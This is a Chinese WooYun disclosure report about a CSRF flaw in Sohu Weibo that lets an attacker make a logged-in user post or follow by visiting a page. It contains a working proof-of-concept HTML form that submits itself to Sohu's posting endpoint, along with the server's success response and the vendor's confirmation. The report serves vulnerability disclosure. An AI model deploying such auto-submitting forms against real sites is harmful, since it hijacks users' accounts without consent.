当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-024886

漏洞标题:搜狐微博CSRF,点击即可加关注

相关厂商:搜狐

漏洞作者: 咖啡

提交时间:2013-06-04 14:29

修复时间:2013-07-19 14:30

公开时间:2013-07-19 14:30

漏洞类型:CSRF

危害等级:低

自评Rank:5

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-06-04: 细节已通知厂商并且等待厂商处理中
2013-06-04: 厂商已经确认,细节仅向厂商公开
2013-06-14: 细节向核心白帽子及相关领域专家公开
2013-06-24: 细节向普通白帽子公开
2013-07-04: 细节向实习白帽子公开
2013-07-19: 细节向公众公开

简要描述:

搜狐微博CSRF,点击即可加关注

详细说明:

http://url.cn/IWEUUc 点击即关注 http://t.cn/zHcmIaJ 点击即转发

<html>
<body>
<form id="c0ffee" name="c0ffee" action="http://t.sohu.com/twAction/insertTwitter" method="POST">
<input type="hidden" name="talk_id" value="1016589">
<input type="hidden" name="msg" value="测试 BY咖啡">
<input type="submit" value="submit" />
</form>
<iframe src="fs.html" width="0" height="0" >
<script>
document.c0ffee.submit();
</script>
</body>
</html>

漏洞证明:

{"status":0,"data":"\r\n<div id=\"8516229882_con\" class=\"twi \">\r\n \r\n\t<div class=\"twiT\">\r\n\t<p ref=\"682341573\" id=\"p_8516229882\" fed=\"\" type=\"\" class=\"avt \">\r\n\t\t<a href=\"http://g00d.t.sohu.com\">\r\n <i title=\"i咖啡\" data-content='{\"type\":\"nick\",\"nick\":\"i咖啡\"}' style=\"background-image: url(http://s5.cr.itc.cn/mblog/icon/60/c7/m_36720584493341711.jpg)\" class=\"img\"><\/i>\r\n <\/a>\r\n\t<\/p>\r\n \r\n \r\n \r\n\r\n<b class=\"pd jsNickBox_682341573\" data-wrap=\"false\">\r\n <b class=\"nm\">\r\n <a title=\"i咖啡\" data-content='{\"type\":\"nick\",\"nick\":\"i咖啡\"}' href=\"http://g00d.t.sohu.com\">i咖啡<\/a>\r\n \r\n \r\n <\/b>\r\n \r\n \r\n<\/b>\r\n\r\n<\/div>\r\n\t<div class=\"twiC\">\r\n\t\t<p class=\"wid\">\r\n\t\t\t<b><\/b>\r\n\t\t<\/p>\r\n \r\n\t\t<p class=\"ugc ugc2\">test<\/p>\r\n\t\t\r\n<div class=\"twiB\">\r\n\t<b class=\"tm\" title=\"2013-05-31 18:39\"><a target=\"_blank\" href=\"http://t.sohu.com/m/8516229882\"><b class=\"k1\">1秒前<\/b><\/a><\/b>\r\n <b class=\"from\">通过<i class=\"t1\">搜狐微博<\/i><\/b>\r\n \r\n\t<ul class=\"tags\"><li class=\"tag\">\r\n <a data-ca=\"newt_twitter_delete\" class=\"fuc crJs_del\" onclick=\"kola('newt.twitter.Twitter', function() {tw.build({type:'del_tw', msgid:'8516229882', ele:this})},{scope:this})\" href=\"javascript:void(1);\"><b>删除<\/b><\/a>\r\n <\/li><li class=\"tag\">\r\n <a data-ca=\"newt_twitter_forward\" class=\"fuc crJs_rt re_tweet\" onclick=\"kola('newt.twitter.Twitter','tw.build({type:\\'at\\',msgid:\\'8516229882\\'})');\" href=\"javascript:void(1);\"><b>转发<q><\/q><\/b><\/a>\r\n <\/li><li class=\"tag\">\r\n <a data-ca=\"newt_twitter_comment\" class=\"fuc crJs_rp\" onclick=\"kola('newt.reply.Reply', function(){tw.reply.rp_show({type:'rp_show', msgid:'8516229882', ele:this, checkRetweet:false})}, {scope:this})\" href=\"javascript:void(1);\"><b>评论<q id=\"num_8516229882\" class=\"js_rp\"><\/q><\/b><\/a>\r\n <\/li><li class=\"tag\">\r\n <a data-ca=\"newt_twitter_addToFavorite\" title=\"收藏\" class=\"fuc crJs_fav\" onclick=\"kola('newt.fav.Fav','tw.fav.add({msgid:\\'8516229882\\',ele:this})',{scope:this});\" href=\"javascript:void(1);\"><i class=\"i iS iCollect\"><\/i><\/a>\r\n \r\n <\/li><li class=\"tag\">\r\n <a data-ca=\"newt_twitter_plus2\" class=\"fuc crJs_plus2\" href=\"javascript:void(1);\" title=\"一键评论并转发\"><i class=\"i iPlus2\"><\/i><\/a>\r\n <\/li><\/ul>\r\n<\/div>\r\n\r\n\t<\/div>\r\n \r\n<\/div>\r\n\r\n","statusText":"发送成功"}

sb.jpg

修复方案:

版权声明:转载请注明来源 咖啡@乌云


漏洞回应

厂商回应:

危害等级:低

漏洞Rank:5

确认时间:2013-06-04 14:38

厂商回复:

感谢对搜狐安全的关注

最新状态:

暂无


漏洞评价:

评论